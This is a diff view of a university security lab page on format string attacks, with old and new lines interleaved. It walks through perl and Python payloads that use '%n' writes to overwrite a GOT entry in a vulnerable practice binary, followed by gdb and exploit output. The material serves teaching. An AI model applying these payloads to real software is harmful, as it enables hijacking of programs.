-Here we managed to write 609 (4+506+99). Note we should keep the number of bytes before the format string the same. Which means that if we want to print with a padding of 100 (three digits) we should remove one ''​A''​. You can try this by yourself.+Here we managed to write 1691 (4+1588+99). Note we should keep the number of bytes before the format string the same. Which means that if we want to print with a padding of 100 (three digits) we should remove one ''​A''​. You can try this by yourself.
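The bookkeeping can be sketched in Python. The sketch keeps the total input length equal to that of the earlier payload (so the positional index ''175'' stays valid) and computes the value that ''%n'' will write for a chosen padding width. It assumes the width is at least ''8'', so that ''%x'' prints exactly that many characters for a 32-bit value; ''build_payload'' is a hypothetical helper name.

```python
WRITE_SPEC = b"%175$08n"  # positional %n that targets the start of the buffer
# Length of the earlier payload; keeping it constant keeps the stack layout stable.
TOTAL_LEN = len(b"ABCD" + b"AAAAAAAA" * 199 + WRITE_SPEC)


def build_payload(pad_width: int):
    """Return (payload, value that %n will write) for a given %<pad_width>x."""
    pad_spec = b"%%%dx" % pad_width
    # Shrink the filler so the overall length does not change.
    fill_len = TOTAL_LEN - 4 - len(pad_spec) - len(WRITE_SPEC)
    payload = b"ABCD" + b"A" * fill_len + pad_spec + WRITE_SPEC
    written = 4 + fill_len + pad_width
    return payload, written


for width in (99, 100, 255):
    payload, written = build_payload(width)
    print(width, len(payload), written)
```

Going from a two-digit to a three-digit width costs one filler byte, which is why one ''A'' has to be removed.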
  
 **How far can we go?** Probably we can use any integer for specifying the number of bytes which are used for a format, but we don't need this; moreover specifying a very large padding is not always feasible, think what happens when printing with ''​snprintf''​. 255 should be enough. **How far can we go?** Probably we can use any integer for specifying the number of bytes which are used for a format, but we don't need this; moreover specifying a very large padding is not always feasible, think what happens when printing with ''​snprintf''​. 255 should be enough.
Line 505: Line 486:
 Remember, we want to write a value to a certain address. So far we control the address, but the value is somewhat limited. If we want to write 4 bytes at a time we can make use of the endianness of the machine. **The idea** is to write at the address n and then at the address n+1 and so on. Remember, we want to write a value to a certain address. So far we control the address, but the value is somewhat limited. If we want to write 4 bytes at a time we can make use of the endianness of the machine. **The idea** is to write at the address n and then at the address n+1 and so on.
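The byte-by-byte idea can be simulated in Python before touching the real binary. This is a sketch under stated assumptions: each ''%n'' stores the running character count as a 4-byte little-endian value, only its lowest byte matters at each address, and every padding is at least ''8'' so that ''%x'' prints exactly that many characters. The target value ''0x0804857b'' is a hypothetical address for ''my_evil_func''; take the real one from ''nm''. The function names are illustrative.

```python
import struct


def byte_write_paddings(target: int, already_written: int, min_pad: int = 8) -> list:
    """Paddings for four %n writes at addr, addr+1, addr+2 and addr+3."""
    paddings = []
    count = already_written
    for i in range(4):
        wanted = (target >> (8 * i)) & 0xFF
        pad = (wanted - count) % 256
        if pad < min_pad:
            pad += 256  # same low byte, but wide enough to print exactly
        paddings.append(pad)
        count += pad
    return paddings


def simulate(paddings: list, already_written: int) -> int:
    """Apply the overlapping 4-byte writes and return the resulting 32-bit value."""
    memory = bytearray(8)  # 4 target bytes plus room for the spill-over
    count = already_written
    for i, pad in enumerate(paddings):
        count += pad
        memory[i:i + 4] = struct.pack("<I", count & 0xFFFFFFFF)
    return struct.unpack("<I", bytes(memory[:4]))[0]


target = 0x0804857B  # hypothetical address of my_evil_func
pads = byte_write_paddings(target, already_written=16)  # 16 = four packed addresses
print(pads, hex(simulate(pads, already_written=16)))
```

Each later write overwrites the spill-over of the previous one, so only the three bytes after the target are left clobbered.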
  
-Let's first display the address. We are using the address ''0x804a008''. This is the address of the GOT entry for the puts function. Basically, we will overwrite the GOT entry for puts. +Let's first display the address. We are using the address ''0x804c014''. This is the address of the GOT entry for the puts function. Basically, we will overwrite the GOT entry for puts.
  
-<code bash> +Check the ''exploit.py'' script from the task directory, read the comments and understand what it does.
-$ objdump -R ./format | grep puts +
-0804a008 R_386_JUMP_SLOT ​  ​puts +
-$ ./format "​$(perl -e 'printf "​\x08\xa0\x04\x08"​. "​\x09\xa0\x04\x08"​ . "​\x0a\xa0\x04\x08"​. "​\x0b\xa0\x04\x08"​ . "​A"​x498 . "​%%255x|"​ . "​%%126\$08x"​ . "​%%255x|"​ . "​%%127\$08x"​ . "​%%255x|"​ . "​%%128\$08x"​')" +
- +
- +
-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​... +
-0|0804a008 +
-f7e2a4d3|0804a009 +
-2|0804a00a +
-ffffd2c4|0804a00b +
-                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            This is the most useless and insecure program! +
- +
-</​code>​ +
-Why are we printing 498 ''​A''​s?​ We added 12 bytes before our format and 6 extra bytes for the output -- the ''​|''​ is there only for pretty print. We want to keep in place the first argument -- anyway, you should always check this.+
  
-Lets replace the ''​%x''​ with ''​%n''​ 
 <code bash> <code bash>
-$ ./format ​"​$(perl -e 'printf "​\x08\xa0\x04\x08"​. "​\x09\xa0\x04\x08"​ . "​\x0a\xa0\x04\x08"​. "​\x0b\xa0\x04\x08"​ . "​A"​x498 . "​%%255x|"​ . "​%%126\$08n"​ . "​%%255x|"​ . "​%%127\$08n"​ . "​%%255x|"​ . "​%%128\$08n"​ . "​%%255x|"​ . "​%%129\$08n"'​)"​ +python exploit.py 
-$ gdb ./​format ​-c core +[*] 'format'​ 
-Program terminated with signal 11, Segmentation fault. +    ​Arch: ​    i386-32-little 
-#0  0x02020202 in ?? () +    ​RELRO: ​   Partial RELRO 
-(gdb) x/x 0x0804a000 +    ​Stack: ​   No canary found 
-0x804a000 <​printf@got.plt>​: 0xf7e5ded0 +    ​NX: ​      NX enabled 
-(gdb) x/x 0x0804a004 +    PIE:      No PIE (0x8048000)
-0x804a004 <fwrite@got.plt>: 0x08048396 +[+] Starting local process './format': pid 29030
-(gdb) x/x 0x0804a008 +[*] Switching to interactive mode
-0x804a008 <puts@got.plt>: 0x02020202 +[*] Process './format' stopped with exit code 0 (pid 29030)
-(gdb) x/x 0x0804a00c +\x14\x04\x15\x04\x17\x04\x18\x04 804c014  804c015  804c017  804c018 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..
-0x804a00c <​__gmon_start__@got.plt>:​ 0x08000006 +This is the most useless and insecure program!
-(gdb) +
 </​code>​ </​code>​
  
-In the gdb session above you can see: +The output starts with ''\x14\x04\x15\x04\x17\x04\x18\x04 804c014  804c015  804c017  804c018'': the four addresses we wrote (raw, little endian), followed by the same addresses printed numerically with ''%x''.
-  - the got entry for printf points to a library address (the address ​starts with 0xf) +
-  - the got entry for fwrite points to some code inside the binary. This means that the function wasn't yet called, the loader didn't load this address yet. +
-  - the puts entry points to 0x02020202. This is the value that we wrote.+
  
-**How come we wrote the first ''​0x02''​?** +If you have the same output it means that now, if you replace ​''​%x'' ​with ''​%n''​ (change ''​fmt ​write_fmt''​ in the script) it will try to write something at those valid addresses.
-Just before executing the first ''​%n'' ​the vulnerable code printed 770 (4*4+498+256) bytes and hex(770) ​== 0x302.+
  
-**How come the rest of the bytes are ''​0x02''?​** +We want to put the value ''​0x080491a6''​.
-After executing the first ''​%n''​ we printed another 256 bytes before each ''​%n''​ so we actually wrote 0x402, 0x502 and 0x602. You can see that the last three bytes ''​%%__gmon_start__@got.plt%%''​ are ''​0x000006''​. +
- +
-We want to put the value ''​0x08048494''​.+
 <code bash> ​ <code bash> ​
 $ objdump -d ./format | grep my_evil $ objdump -d ./format | grep my_evil
-08048494 ​<​my_evil_func>:​ +080491a6 ​<​my_evil_func>:​
-</​code>​ +
-The first byte is ''​0x94''​ (little endian), recall that we were able to write ''​0x02'',​ writing ''​0x94''​ means replacing first 255 with 255-(0x102-0x94) == 145. +
-<code bash> +
-$ ./format "​$(perl -e '​printf "​\x08\xa0\x04\x08"​. "​\x09\xa0\x04\x08"​ . "​\x0a\xa0\x04\x08"​. "​\x0b\xa0\x04\x08"​ . "​A"​x498 . "​%%145x|"​ . "​%%126\$08n"​ . "​%%255x|"​ . "​%%127\$08n"​ . "​%%255x|"​ . "​%%128\$08n"​ . "​%%255x|"​ . "​%%129\$08n"'​)"​ +
-$ gdb ./format -c core +
-#0  0x94949494 in ?? () +
-(gdb) quit +
-</​code>​ +
-The next byte that we want to write is ''​0x84''​ so we need to replace 255 with 235. We can continue this idea until we profit. +
-<code bash> +
-$ ./format "​$(perl -e '​printf "​\x08\xa0\x04\x08"​. "​\x09\xa0\x04\x08"​ . "​\x0a\xa0\x04\x08"​. "​\x0b\xa0\x04\x08"​ . "​A"​x498 . "​%%145x|"​ . "​%%126\$08n"​ . "​%%239x|"​ . "​%%127\$08n"​ . "​%%127x|"​ . "​%%128\$08n"​ . "​%%259x|"​ . "​%%129\$08n"'​)"​ | tr -s ' ' > /dev/null +
-I'm evil, but nobody calls me :-(+
 </​code>​ </​code>​
 +<note important>​
 +As ''%n'' writes how many characters have been printed until it is reached, each successive ''%n'' will write an incrementally larger value.
 +We use the 4 adjacent addresses to write byte by byte and use overflows to reach a lower value for the next byte.
 +For example, after writing ''0xa6'' we can write ''0x0191'':
 +
 +{{cns:​labs:​bytes_write.png?​500}}
 +
 +Also, the ''%n'' count does not reset, so if we want to write ''0xa6'' and then ''0x91'' the payload should have the form:
 +
 +''<​0xa6 bytes>​%n<​0x100 - 0xa6 + 0x91 bytes>​%n''​
 +
 +As mentioned earlier, instead of writing N bytes as ''"A" * N'' you can use format specifiers like ''%Nc'' or ''%Nx'' to keep the payload shorter.
 +</​note>​
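
The arithmetic in the note can be sketched in Python. This is an illustration under stated assumptions, not the contents of ''exploit.py'': the function ''paddings_for'' and its ''already_printed'' parameter are hypothetical names. The sketch only computes how many extra characters must be printed before each of the four ''%n'' writes so that the low byte of the running count matches the next byte of the target value.

```python
def paddings_for(value, already_printed=0):
    """Return the number of extra characters to print before each of four %n
    writes so that the low byte of the running count equals each byte of
    `value`, least significant byte first."""
    pads = []
    count = already_printed
    for shift in (0, 8, 16, 24):
        wanted = (value >> shift) & 0xFF
        pad = (wanted - count) % 0x100  # wrap around instead of going negative
        pads.append(pad)
        count += pad
    return pads

# Address of my_evil_func from the objdump output above.
print(paddings_for(0x080491a6))
```

For ''0x080491a6'' the second padding is 235, which is the ''0x100 - 0xa6 + 0x91'' from the note. In a real payload ''already_printed'' would account for whatever is emitted before the first ''%n'' (for example the 16 bytes of the four addresses). A small padding may also need ''0x100'' added to it, because ''%Nx'' never prints fewer characters than the value's own digits.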
  
 **[1p] Bonus task** Can you get a shell? (Assume ASLR is disabled). **[1p] Bonus task** Can you get a shell? (Assume ASLR is disabled).
Line 587: Line 546:
   * Pidgin off the record plugin [[http://​www.cvedetails.com/​cve/​CVE-2012-2369|CVE-2012-2369]]. The fix is [[https://​bugzilla.novell.com/​show_bug.cgi?​id=762498#​c1|here]]   * Pidgin off the record plugin [[http://​www.cvedetails.com/​cve/​CVE-2012-2369|CVE-2012-2369]]. The fix is [[https://​bugzilla.novell.com/​show_bug.cgi?​id=762498#​c1|here]]
  
 +===== Resources =====
 +
 +  * [[http://​www.cert.org/​books/​secure-coding/​|Secure Coding in C and C++]]
 +  * [[http://​www.informit.com/​articles/​article.aspx?​p=2036582|String representation in C]]
 +  * [[https://​www.owasp.org/​index.php/​Improper_string_length_checking|Improper string length checking]]
 +  * [[http://​cwe.mitre.org/​data/​definitions/​134.html|Format String definition]],​ [[https://​www.owasp.org/​index.php/​Format_string_attack|Format String Attack ​ (OWASP)]], [[http://​projects.webappsec.org/​w/​page/​13246926/​Format%20String|Format String Attack (webappsec)]]  ​
 +  * [[http://​www.gratisoft.us/​todd/​papers/​strlcpy.html|strlcpy and strlcat - consistent, safe, string copy and concatenation.]] This resource is useful to understand some of the string manipulation problems.
cns/labs/lab-07.txt · Last modified: 2022/11/21 14:29 by mihai.dumitru2201
CC Attribution-Share Alike 3.0 Unported